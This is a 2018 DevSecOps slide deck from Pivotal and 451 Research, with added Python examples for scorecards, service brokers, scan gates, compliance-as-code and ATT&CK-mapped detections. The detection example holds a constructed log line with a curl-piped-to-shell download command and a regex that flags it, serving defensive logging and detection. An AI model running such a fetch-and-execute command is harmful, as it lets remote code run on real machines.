© Copyright 2018 Pivotal Software, Inc. All rights Reserved. Version 1.0
Justin Smith
Pivotal
@justinjsmith
April 26, 2018
InfoSec: Evolve Thyself to Keep Pace in the Age of DevOps
Fernando Montenegro
451 Research
@fsmontenegro
Jared Ruckle
Pivotal
@jaredruckle
Agenda
■  Security in the Enterprise
■  Security Transformation Framework
■  Culture
■  Automation
■  Lean Controls
■  Metrics
■  Q+A
Security in the enterprise.
Security is kinda similar.
The Typical Scenario

Slow Enforcement
●  Not enough security team staffing
●  Enforcement stuck on a local maximum

Project-based Mass Casualties
●  Team-based decisions and choice
●  Massive variation across the organization
●  Too many systems with poor compliance

Intractable
●  Triage becomes the vital skill
●  Low morale
●  No clear answer
●  Mundane, never-ending tasks
INFORMATION SECURITY: BUDGETS AND OUTLOOK 2017
Information Security Spending Distribution Among Security Tools (Information Security Respondents)
Source: 451 Research, Voice of the Enterprise: Information Security, Budgets and Outlook 2017
Q5. Approximately, how is your organization’s total information security spending currently distributed across the following vendor based security tools today? Please sum to 100%.

Percent of sample        2015 Q4 (n=724)   2016 Q4 (n=401)   2017 Q4 (n=371)
Network security               40.0%            37.5%            35.9%
Endpoint security              26.3%            29.4%            24.9%
Security management            19.6%            17.4%            20.0%
Application security           10.2%             8.9%            14.9%
Other                           3.9%             6.8%             4.3%
You want speed & security.
Security Transformation Framework
●  Culture: it’s attractive.
●  Automation: it’s automatic.
●  Lean Controls: it’s valuable.
●  Metrics: it’s visible.
Culture

Reputation: Build Prestige
Shift away from domination and enforcement as primary tools. Collaborate and demonstrate value.
●  Security Inceptions with teams
●  Invest in external learning
●  Reserved use of the Big Stick

Rotations & Education: Spread Awareness
Create the ability to rotate people onto the security team for 2-3 months. It will change the organization.
●  Quarterly rotations
●  Lunch & Learns
●  Retros and stories

Skills & Hiring: Generalists & Specialists
Mix domain knowledge and generalists. New graduates tend to have higher security awareness.
●  You gotta code
●  Build tools others want to use
●  Very little is rocket surgery
INFORMATION SECURITY: BUDGETS AND OUTLOOK 2017
Top Strategic Security Objectives (Information Security Respondents, n = 562)
Source: 451 Research, Voice of the Enterprise: Information Security, Budgets and Outlook 2017
Q2. What are your top strategic security objectives for 2018? Please select up to 3.

Percent of sample
Implement or improve security monitoring                          34.5%
Minimize the probability or impact of a possible data breach      31.5%
Improve network security                                          24.2%
Secure emerging architectures including the cloud                 22.1%
Implement or improve security analytics                           21.5%
Achieve regulatory compliance                                     20.5%
Improve application security                                      19.4%
Improve incident response                                         18.7%
Automate common security tasks                                    18.7%
Build (staff) the security team                                   18.5%
Integrate new endpoint security tools                             15.3%
Raise the security team’s profile in the business                 13.0%
Securing Internet of Things (IoT) devices                         11.2%
Other                                                              4.4%
Automation

App Scorecards
Centralize scoring for applications, and turn it into a game that attracts participation and spreads best practices.
●  security.yaml in repos
●  Visible badging
●  Opt-in participation
●  Iterative scoring
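One way to build that scorecard, as an added example that is not the deck's or Pivotal's code: each repo carries a flat security.yaml, a versioned rubric weights the checks, and the output is a score, a badge and the failed checks. The yaml keys, the weights, the badge thresholds and the three sample repos are assumptions made for the example; a repo with no file is reported as not enrolled rather than scored, which is what opt-in means in practice.

```python
"""Score each repo's security.yaml and award a badge.

Added example (not from the deck). The security.yaml keys, the rubric
weights and the badge thresholds are assumptions for illustration.
"""
import re

# Constructed security.yaml contents for three repos; a real scorer would
# read the file from each repository root.
REPOS = {
    "payments-api": """\
version: 2
owner: team-payments
dependency_scanning: true
sast_in_ci: true
secrets_scanning: true
days_since_pentest: 90
mfa_on_repo: true
""",
    "legacy-batch": """\
version: 2
owner: team-ops
dependency_scanning: false
sast_in_ci: false
secrets_scanning: true
days_since_pentest: 900
mfa_on_repo: false
""",
    # No security.yaml at all: opt-in means this repo is simply "not enrolled".
    "scratch-tool": None,
}

# Rubric v2: (check, weight). "Iterative scoring" means the weights change as
# the rubric evolves, so the rubric is versioned next to the yaml it scores.
RUBRIC_VERSION = 2
RUBRIC = [
    ("dependency_scanning", 25),
    ("sast_in_ci", 20),
    ("secrets_scanning", 25),
    ("mfa_on_repo", 15),
    ("recent_pentest", 15),   # derived: days_since_pentest <= 365
]
BADGES = [(90, "gold"), (70, "silver"), (40, "bronze"), (0, "none")]


def parse_flat_yaml(text):
    """Parse the flat `key: value` subset of YAML used above (no nesting, no lists)."""
    data = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line:
            continue
        key, _, value = line.partition(":")
        key, value = key.strip(), value.strip()
        if value.lower() in ("true", "false"):
            data[key] = value.lower() == "true"
        elif re.fullmatch(r"-?\d+", value):
            data[key] = int(value)
        else:
            data[key] = value
    return data


def score(doc):
    """Return (score 0-100, badge, failed checks) for one parsed security.yaml."""
    facts = dict(doc)
    facts["recent_pentest"] = doc.get("days_since_pentest", 10**9) <= 365
    total, failed = 0, []
    for check, weight in RUBRIC:
        if facts.get(check) is True:
            total += weight
        else:
            failed.append(check)
    badge = next(name for threshold, name in BADGES if total >= threshold)
    return total, badge, failed


def scorecard(repos):
    """Centralised scorecard: repo -> result, with unenrolled repos listed explicitly."""
    results = {}
    for name, text in repos.items():
        if text is None:
            results[name] = {"enrolled": False}
            continue
        doc = parse_flat_yaml(text)
        total, badge, failed = score(doc)
        results[name] = {
            "enrolled": True, "owner": doc.get("owner"), "rubric": RUBRIC_VERSION,
            "score": total, "badge": badge, "failed": failed,
        }
    return results


if __name__ == "__main__":
    ranked = sorted(scorecard(REPOS).items(), key=lambda kv: -kv[1].get("score", -1))
    for repo, result in ranked:
        print(repo, result)
```

The badge is what gets rendered in the repo README; the failed-check list is what the team sees when they click it, so the game has a concrete next move.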
Build Service Brokers
Automate onboarding and offboarding for accessing systems, and API-specific tasks like AuthN/AuthZ and credentials.
●  Control connection points
●  Control credentials
●  Ensure visibility
●  Ensure consistency
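The core of such a broker, as an added example rather than Pivotal's broker code: the four Open Service Broker API operations are modelled in memory with no HTTP layer, every bind mints a credential that exists only for that binding, unbind revokes it, and deprovision refuses to orphan live bindings. The credential shape, the hashing and the audit-record fields are assumptions made for the example.

```python
"""Service-broker core: unique credentials per binding, revoked on unbind, audited.

Added example, not Pivotal's broker code. It models the four Open Service
Broker API operations (provision, bind, unbind, deprovision) in memory with
no HTTP layer; the credential shape and audit-record fields are assumptions.
"""
import datetime as dt
import hashlib
import secrets


class Broker:
    def __init__(self):
        self.instances = {}   # instance_id -> {"plan": str, "bindings": set()}
        self.bindings = {}    # binding_id -> {"instance": str, "username": str, "secret_hash": str}
        self.audit = []       # every state change, as evidence for the SOC and for audits

    def _log(self, event, **fields):
        self.audit.append({"ts": dt.datetime.now(dt.timezone.utc).isoformat(),
                           "event": event, **fields})

    def provision(self, instance_id, plan):
        if instance_id in self.instances:
            raise ValueError("instance already exists")
        self.instances[instance_id] = {"plan": plan, "bindings": set()}
        self._log("provision", instance=instance_id, plan=plan)

    def bind(self, instance_id, binding_id):
        """Onboarding: mint a credential that belongs to this binding only."""
        inst = self.instances[instance_id]
        if binding_id in self.bindings:
            raise ValueError("binding already exists")
        username = f"svc_{instance_id}_{binding_id}"
        password = secrets.token_urlsafe(32)
        self.bindings[binding_id] = {
            "instance": instance_id, "username": username,
            # Keep only a hash: the broker can verify and revoke without holding the secret.
            "secret_hash": hashlib.sha256(password.encode()).hexdigest(),
        }
        inst["bindings"].add(binding_id)
        self._log("bind", instance=instance_id, binding=binding_id, user=username)
        # The plaintext leaves the broker exactly once, in the bind response.
        return {"username": username, "password": password, "uri": f"db://{instance_id}"}

    def is_valid(self, binding_id, password):
        """What the backing service checks on connect: a live binding and a matching secret."""
        b = self.bindings.get(binding_id)
        if b is None:
            return False
        digest = hashlib.sha256(password.encode()).hexdigest()
        return secrets.compare_digest(b["secret_hash"], digest)

    def unbind(self, instance_id, binding_id):
        """Offboarding: dropping the binding revokes its credential; nothing lingers."""
        b = self.bindings.pop(binding_id)
        self.instances[instance_id]["bindings"].discard(binding_id)
        self._log("unbind", instance=instance_id, binding=binding_id, user=b["username"])

    def deprovision(self, instance_id):
        """Refuse to delete an instance with live bindings, so no credential outlives its owner."""
        if self.instances[instance_id]["bindings"]:
            raise RuntimeError("unbind all bindings first")
        del self.instances[instance_id]
        self._log("deprovision", instance=instance_id)


def lifecycle_demo():
    """Provision, bind, use, unbind, deprovision; returns the credential's validity before and after."""
    broker = Broker()
    broker.provision("inst-1", plan="small")
    creds = broker.bind("inst-1", "bind-a")
    valid_before = broker.is_valid("bind-a", creds["password"])
    broker.unbind("inst-1", "bind-a")
    valid_after = broker.is_valid("bind-a", creds["password"])
    broker.deprovision("inst-1")
    return valid_before, valid_after, [e["event"] for e in broker.audit]


def orphan_check():
    """True if the broker refuses to deprovision while a binding is still live."""
    broker = Broker()
    broker.provision("inst-2", plan="small")
    broker.bind("inst-2", "bind-b")
    try:
        broker.deprovision("inst-2")
    except RuntimeError:
        return True
    return False
```

Because the platform calls unbind when an app is deleted or rebound, the credential's lifetime is tied to the app's, and the audit list is the visibility the slide asks for.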
Tiered Scanning
Dynamic, static, vulnerability, log, and configuration-assurance scanning can all be completely automated.
●  Control app stacks
●  CI/CD scanning
●  Ingestion scanning
●  Logging alerts to the SOC
●  Configuration drift alerts
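A pipeline gate that ties those tiers together, as an added example and not code from the deck: dependency and SAST findings arrive from the scanners, the configuration tier is computed as drift against a known-good baseline, and one tiered policy decides what blocks the build, what only warns, and what is sent to the SOC as a JSON alert line. The finding shape, the policy thresholds, the baseline and the per-key severities are all assumptions made for the example.

```python
"""CI/CD scan gate: tiered policy over dependency, SAST and configuration findings.

Added example, not from the deck. Real scanners emit their own formats; the
findings here are constructed in one simplified shape, and the policy
thresholds, the baseline and the per-key severities are assumptions.
"""
import json

# Constructed findings from the dependency and SAST tiers of one build.
SCANNER_FINDINGS = [
    {"tier": "dependency", "id": "dep-1", "severity": "critical", "package": "libfoo 1.2.3", "fix_version": "1.2.4"},
    {"tier": "dependency", "id": "dep-2", "severity": "medium", "package": "libbar 0.9", "fix_version": None},
    {"tier": "sast", "id": "sast-1", "severity": "high", "file": "app/db.py", "line": 88, "rule": "sql-injection"},
]

# Known-good configuration (baseline) vs. what the deployed app reports (constructed).
BASELINE = {"tls_min_version": "1.2", "debug_enabled": False, "admin_cidr": "10.0.0.0/8"}
ACTUAL = {"tls_min_version": "1.0", "debug_enabled": True, "admin_cidr": "10.0.0.0/8"}
SEVERITY_BY_KEY = {"tls_min_version": "high", "debug_enabled": "low", "admin_cidr": "critical"}

POLICY = {
    "block_on": {"critical", "high"},   # fail the pipeline
    "warn_on": {"medium"},              # annotate the build, keep going
    "soc_alert_tiers": {"config"},      # drift is a SOC event regardless of severity
}


def drift_findings(baseline, actual, severities=SEVERITY_BY_KEY):
    """Configuration-assurance tier: every key that differs from the baseline is a finding."""
    out = []
    for key in sorted(set(baseline) | set(actual)):
        if baseline.get(key) != actual.get(key):
            out.append({"tier": "config", "id": key, "severity": severities.get(key, "medium"),
                        "expected": baseline.get(key), "actual": actual.get(key)})
    return out


def evaluate(findings, policy=POLICY):
    """Apply the tiered policy; returns (decision, blocking, warnings, soc_alert_json_lines)."""
    blocking, warnings, alerts = [], [], []
    for f in findings:
        if f["severity"] in policy["block_on"]:
            blocking.append(f)
        elif f["severity"] in policy["warn_on"]:
            warnings.append(f)
        if f["tier"] in policy["soc_alert_tiers"]:
            alerts.append(json.dumps({"source": "ci-scan", "type": "config_drift", "key": f["id"],
                                      "severity": f["severity"], "expected": f["expected"],
                                      "actual": f["actual"]}, sort_keys=True))
    decision = "block" if blocking else ("warn" if warnings else "pass")
    return decision, blocking, warnings, alerts


def gate(scanner_findings=SCANNER_FINDINGS, baseline=BASELINE, actual=ACTUAL):
    """Run all tiers for one build and return the gate result."""
    return evaluate(list(scanner_findings) + drift_findings(baseline, actual))


if __name__ == "__main__":
    decision, blocking, warnings, alerts = gate()
    print("decision:", decision)
    for f in blocking:
        print("BLOCK", f["tier"], f["id"], f["severity"])
    for line in alerts:
        print("SOC", line)
```

A low-severity drift such as debug_enabled does not stop the build, but it still reaches the SOC, which is the difference between a scanner and a control.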
INFORMATION SECURITY: BUDGETS AND OUTLOOK 2017
Application Security Vendor Usage Allocation (Respondents with application security in use or in pilot)
Source: 451 Research, Voice of the Enterprise: Information Security, Vendor Evaluations 2017
Q6. How is usage of application security tools allocated across the following teams in your organization? Please sum to 100.

Mean percent                Q3 2015 (n=181)   Q3 2016 (n=256)   Q3 2017 (n=159)
Application Development          22.7%             27.6%             30.5%
Quality Assurance                17.5%             19.9%             16.6%
Information Security             57.3%             46.2%             44.7%
Other                             2.5%              6.2%              8.1%
Lean Controls

Compliance as Code
Inherit controls and compliance from the platform. Automate the documentation of controls and System Security Plans (SSPs) as part of the team’s normal motion.
●  Explore OpenControl (open-control.org)
●  Always-on, always-current SSP
●  Expose as top-down controls

Leverage the Platform
Approach the platform as a way to gain radical control. Leverage all platform controls so that applications inherit security.
●  Re-use vs. build
●  Shorten the on-ramp
●  Internal marketing
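What "compliance as code" and "inherit from the platform" look like together, as an added example that is neither the deck's code nor OpenControl's tooling: components declare which controls they satisfy with a narrative, an application names the platform it inherits from, and the SSP fragment is regenerated from that data on every run, with any baseline control that nobody implements flagged as a gap. The structure loosely mirrors OpenControl's component.yaml (control_key, narrative), but the components, the narratives and the baseline control list are constructed for the example.

```python
"""Generate an always-current SSP fragment from machine-readable control narratives.

Added example, not from the deck or from OpenControl's tooling. The data
loosely mirrors OpenControl's component.yaml (control_key, narrative) but is
constructed here; the baseline control list is an assumption.
"""

# Controls the system must document (constructed subset of a baseline).
BASELINE = ["AC-2", "AC-6", "AU-2", "IA-5", "SC-13"]

# Components, platform first so that applications can inherit its narratives.
COMPONENTS = [
    {"name": "cloud-platform", "satisfies": [
        {"control_key": "AC-2", "narrative": "Accounts are provisioned through the platform's identity service."},
        {"control_key": "AU-2", "narrative": "All application and platform logs are forwarded to the central log store."},
        {"control_key": "SC-13", "narrative": "TLS terminates at the platform router; secrets live in the credential store."},
    ]},
    {"name": "payments-api", "inherits_from": "cloud-platform", "satisfies": [
        {"control_key": "AC-6", "narrative": "Service accounts are minted per binding with least privilege."},
    ]},
]


def build_ssp(system, components, baseline):
    """Return ({control: [(component, narrative), ...]}, [uncovered baseline controls])."""
    by_name = {c["name"]: c for c in components}
    implemented = {}
    chain, seen = [system], set()
    # Walk the inheritance chain: the system's own narratives first, then each parent's.
    while chain:
        name = chain.pop(0)
        if name in seen:
            continue
        seen.add(name)
        comp = by_name[name]
        for s in comp["satisfies"]:
            implemented.setdefault(s["control_key"], []).append((name, s["narrative"]))
        if comp.get("inherits_from"):
            chain.append(comp["inherits_from"])
    gaps = [c for c in baseline if c not in implemented]
    return implemented, gaps


def render(system, components, baseline):
    """Plain-text SSP section for one system, marking inherited controls and gaps."""
    implemented, gaps = build_ssp(system, components, baseline)
    lines = [f"System Security Plan: {system}"]
    for control in baseline:
        lines.append("")
        lines.append(control)
        for comp, text in implemented.get(control, []):
            origin = "implemented" if comp == system else f"inherited from {comp}"
            lines.append(f"  [{origin}] {text}")
        if control not in implemented:
            lines.append("  [GAP] no implementation narrative")
    return "\n".join(lines), gaps


if __name__ == "__main__":
    text, gaps = render("payments-api", COMPONENTS, BASELINE)
    print(text)
    print("\ngaps:", gaps)
```

Run this in the pipeline and the SSP is never older than the last commit; run it with the platform component removed and the gap list shows exactly how much the application was inheriting.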
ATT&CK-centric
Focus on MITRE ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge). Use standards as a way to benchmark resilience.
●  Value-stream mapping
●  Start with the adversary
●  Describe threats and kill-chains
INFORMATION SECURITY: WORKLOADS AND KEY PROJECTS 2017
Status of Implementation (Information Security Respondents)
Source: 451 Research, Voice of the Enterprise: Information Security, Workloads and Key Projects 2017
Q10. What is your status of implementation for each of the following technologies?
Stacked-bar chart with six statuses per technology: In Use (Not Including Pilots), In Pilot/Proof of Concept, Planning To Deploy in the Next 6 Months, Planning To Deploy in the Next 6-12 Months, Planning To Deploy in the Next 12-24 Months, Not in Plan. Only the In Use series is reproduced here (percent of sample):
Firewall (Including Next-Generation Firewall) (n = 599)                        88.6%
Web Content Filtering (n = 586)                                                80.2%
Vulnerability Management (Scanning) (n = 588)                                  76.0%
Intrusion Detection/Prevention Systems (IDS/IPS) (n = 579)                     70.8%
Encryption (n = 588)                                                           70.6%
Information Security Awareness Training (n = 584)                              66.4%
Multi-Factor Authentication (n = 574)                                          55.7%
Web Application Firewall (WAF) (n = 522)                                       54.0%
Mobile Device Management (MDM)/Enterprise Mobility Management (EMM) (n = 568)  49.6%
Anti-DDoS (Distributed Denial of Service) (n = 525)                            46.9%
Computer Forensics/Incident Response (n = 542)                                 44.1%
Identity as a Service (IDaaS)/Single Sign-On (n = 550)                         39.5%
Data Leakage Prevention (DLP) (n = 528)                                        33.0%
Managed Security Services Provider (MSSP) (n = 509)                            29.5%
Threat Intelligence Platforms (n = 501)                                        29.1%
User Behavior Analytics (UBA) (n = 489)                                        13.5%
Metrics

SOC Events
Grow operational maturity by constantly improving the quality and types of notifications in the SOC.
●  Follows ATT&CK concepts
●  Doesn’t matter where you start
●  Forces the right behaviors
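An added example, not code from the deck, of the ATT&CK-centric lean control and the SOC-events metric together: three detection rules run over log lines, each alert carries the ATT&CK technique and tactic it maps to, and the coverage table shows which tactics have no detection at all, which is the backlog the slide says to grow from wherever you start. The log lines are constructed, the rules are deliberately simple, and each technique is pinned to a single tactic for the coverage count although ATT&CK lists some under several.

```python
"""Detections mapped to MITRE ATT&CK, with tactic coverage as the SOC metric.

Added example, not from the deck. The log lines are constructed, the three
rules are deliberately simple, and each technique is pinned to one tactic
for the coverage count although ATT&CK lists some under several.
"""
import re
from collections import Counter

TACTICS = ["Initial Access", "Execution", "Persistence", "Privilege Escalation",
           "Defense Evasion", "Credential Access", "Discovery", "Lateral Movement",
           "Collection", "Command and Control", "Exfiltration", "Impact"]

# rule -> (technique id, technique name, tactic counted for coverage)
RULES = {
    "ssh-bruteforce": ("T1110", "Brute Force", "Credential Access"),
    "bruteforce-then-success": ("T1078", "Valid Accounts", "Initial Access"),
    "curl-pipe-shell": ("T1059", "Command and Scripting Interpreter", "Execution"),
}

# Constructed log lines: a password spray that succeeds, then a download-and-run.
LOGS = [
    "2018-04-26T10:00:01Z sshd[1]: Failed password for root from 203.0.113.7 port 40001",
    "2018-04-26T10:00:02Z sshd[1]: Failed password for root from 203.0.113.7 port 40002",
    "2018-04-26T10:00:03Z sshd[1]: Failed password for admin from 203.0.113.7 port 40003",
    "2018-04-26T10:00:04Z sshd[1]: Failed password for root from 203.0.113.7 port 40004",
    "2018-04-26T10:00:05Z sshd[1]: Failed password for root from 203.0.113.7 port 40005",
    "2018-04-26T10:00:09Z sshd[1]: Accepted password for root from 203.0.113.7 port 40006",
    "2018-04-26T10:01:00Z audit: exec user=www-data cmd=\"bash -c 'curl http://198.51.100.5/x | sh'\"",
    "2018-04-26T10:02:00Z sshd[1]: Failed password for bob from 192.0.2.10 port 50000",
]

FAIL = re.compile(r"Failed password for (\S+) from (\S+)")
ACCEPT = re.compile(r"Accepted password for (\S+) from (\S+)")
EXEC = re.compile(r'exec user=(\S+) cmd="(.*)"')
PIPE_TO_SHELL = re.compile(r"curl[^|]*\|\s*(ba)?sh\b")


def detect(lines, threshold=5):
    """Run the rules over log lines; every alert carries its ATT&CK technique and tactic."""
    alerts, failures = [], Counter()
    for line in lines:
        m = FAIL.search(line)
        if m:
            src = m.group(2)
            failures[src] += 1
            if failures[src] == threshold:      # alert once per source, when the threshold is crossed
                alerts.append({"rule": "ssh-bruteforce", "src": src, "line": line})
            continue
        m = ACCEPT.search(line)
        if m:
            user, src = m.groups()
            if failures[src] >= threshold:      # a success right after a spray: treat as compromised
                alerts.append({"rule": "bruteforce-then-success", "src": src, "user": user, "line": line})
            continue
        m = EXEC.search(line)
        if m and PIPE_TO_SHELL.search(m.group(2)):
            alerts.append({"rule": "curl-pipe-shell", "user": m.group(1), "line": line})
    for a in alerts:
        a["technique"], a["name"], a["tactic"] = RULES[a["rule"]]
    return alerts


def coverage(rules=RULES, tactics=TACTICS):
    """tactic -> rules that cover it; the empty lists are the SOC's backlog."""
    cov = {t: [] for t in tactics}
    for rule, (_, _, tactic) in rules.items():
        cov[tactic].append(rule)
    return cov


if __name__ == "__main__":
    for a in detect(LOGS):
        print(a["tactic"], a["technique"], a["name"], a["rule"], a.get("src", a.get("user")))
    for tactic, rules in coverage().items():
        print(f"{tactic:20s} {'covered' if rules else 'NO DETECTION'}")
```

Reporting "9 of 12 tactics have no detection" to the team every sprint is the metric; the rule that closes the next gap is the behavior it forces.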
Usual Suspects
Patching, vulnerabilities, # apps, # brokers, # DCs, # users, # FIDs, # certs, # domains, # security agents, team size, LOC, etc.
●  The basics still apply
●  Consider false positives also
●  Reduce friction for adoption
Emphasize Age
Clusters, VMs, containers, brokers, credentials: they all have ages worth measuring and attempting to shorten.
●  Older is more fragile
●  Requires automation
●  Forces the right behaviors
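An added example, not from the deck, of the age metric and of the repave/rotate half of the "3Rs" the closing slides summarise: an inventory of VMs, containers, clusters, brokers and credentials is aged against a fixed clock, each type gets a maximum acceptable age, and the output is both the per-type report (count, median, max, overdue) and the oldest-first work queue the automation should drain. The inventory, the fixed "now" and the per-type limits are constructed; a real run would pull them from the platform API and the credential store.

```python
"""Age metrics: how old is everything, and what is overdue for repave or rotate?

Added example, not from the deck. The inventory, the fixed "now" and the
per-type maximum ages are constructed; a real run would pull them from the
platform's API and the credential store.
"""
import datetime as dt
import statistics

NOW = dt.datetime(2018, 4, 26, tzinfo=dt.timezone.utc)   # fixed so the numbers are reproducible

# Assumed policy: maximum acceptable age in days before repave (infrastructure) or rotate (credentials).
MAX_AGE_DAYS = {"vm": 7, "container": 1, "cluster": 30, "broker": 30, "credential": 14}

INVENTORY = [
    {"type": "vm", "id": "diego-cell-0", "created": "2018-04-24"},
    {"type": "vm", "id": "diego-cell-1", "created": "2018-03-01"},
    {"type": "container", "id": "payments-api/0", "created": "2018-04-25T22:00:00"},
    {"type": "container", "id": "legacy-batch/0", "created": "2018-04-10"},
    {"type": "credential", "id": "/payments/db-password", "created": "2018-04-20"},
    {"type": "credential", "id": "/legacy/admin-token", "created": "2017-09-01"},
    {"type": "cluster", "id": "pks-cluster-a", "created": "2018-04-01"},
    {"type": "broker", "id": "mysql-broker", "created": "2018-04-15"},
]


def age_days(created, now=NOW):
    """Age of an ISO-8601 creation timestamp in days (naive timestamps are taken as UTC)."""
    t = dt.datetime.fromisoformat(created)
    if t.tzinfo is None:
        t = t.replace(tzinfo=dt.timezone.utc)
    return (now - t).total_seconds() / 86400


def age_report(inventory=INVENTORY, now=NOW, policy=MAX_AGE_DAYS):
    """Per type: count, median and max age in days, and the ids past their maximum age."""
    report = {}
    for item in inventory:
        age = age_days(item["created"], now)
        entry = report.setdefault(item["type"], {"count": 0, "ages": [], "overdue": []})
        entry["count"] += 1
        entry["ages"].append(age)
        if age > policy[item["type"]]:
            entry["overdue"].append(item["id"])
    for entry in report.values():
        ages = entry.pop("ages")
        entry["median_age_days"] = round(statistics.median(ages), 2)
        entry["max_age_days"] = round(max(ages), 2)
    return report


def work_queue(inventory=INVENTORY, now=NOW, policy=MAX_AGE_DAYS):
    """Oldest-first list of (action, id, age_days) for the automation to drain."""
    queue = []
    for item in inventory:
        age = age_days(item["created"], now)
        if age > policy[item["type"]]:
            action = "rotate" if item["type"] == "credential" else "repave"
            queue.append((action, item["id"], round(age, 1)))
    return sorted(queue, key=lambda q: -q[2])


if __name__ == "__main__":
    for kind, entry in age_report().items():
        print(f"{kind:10s} n={entry['count']} median={entry['median_age_days']} "
              f"max={entry['max_age_days']} overdue={entry['overdue']}")
    for action, ident, age in work_queue():
        print(action, ident, f"{age} days")
```

The max-age column is the number to put on the wall: a credential that is 237 days old is useful to whoever stole it for 237 days, and the only way the number goes down and stays down is automation that repaves and rotates on a schedule.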
INFORMATION SECURITY: ORGANIZATIONAL DYNAMICS 2017
Metrics To Manage Security (Information Security Respondents)
Source: 451 Research, Voice of the Enterprise: Information Security, Organizational Dynamics 2017
Q44. Which of the following metrics does your organization use/track for information security staff? Please select all that apply.

Percent of sample                                  Q2 2016 (n=837)   Q2 2017 (n=421)
Security Incidents Resolved                              53.0%             47.5%
Tickets Resolved (e.g., ‘Trouble Tickets’)               42.8%             39.0%
Audit Issues Resolved                                    44.9%             34.4%
Application Availability (e.g., Uptime/Downtime)         34.2%             34.2%
Project Completion                                       34.4%             32.3%
Time to Recovery/Restore from an Outage                  31.2%             29.2%
Lack of Data Breaches                                    32.4%             28.3%
We Don’t Use Metrics                                     21.9%             21.9%
Other                                                     2.2%              4.0%
It’s possible to be more secure and go faster.

Repair: Repair vulnerable software as soon as updates are available.
Repave: Repave servers and applications from a known good state. Do this often.
Rotate: Rotate user credentials frequently, so they are only useful for short periods of time.
Turnkey Compliance: Apps inherit controls from the platform, simplifying audits.

Call to Action: Investigate Cloud Native Security
Reduce Your MTTR | Resist Advanced Persistent Threats | Reduce the Threat of Leaked Credentials
Diagram: the Pivotal platform as the delivery chain for the “3Rs” (labels recovered from the slide):
●  IaaS: vSphere, Azure & Azure Stack, Google Cloud, AWS, OpenStack; NSX-T; CPI (15 methods)
●  Embedded OS (Windows & Linux), versioned v1, v2, v3, ...
●  Pivotal Application Service (PAS), cf push: Buildpacks | Spring Boot | Spring Cloud | Steeltoe (Java | .NET | NodeJS)
●  Pivotal Container Service (PKS), kubectl run: Elastic | Packaged Software | Spark
●  Application Code & Frameworks on top of the platform
●  Pivotal Network: CVEs and Product Updates flow through Github and Concourse (continuous delivery) to Pivotal and Partner Products
●  Pivotal Services Marketplace: Public Cloud Services and Customer Managed Services via the Open Service Broker API
●  Repair (CVEs) | Repave | Rotate (CredHub)
Thank You. Questions?
Transforming How The World Builds Software
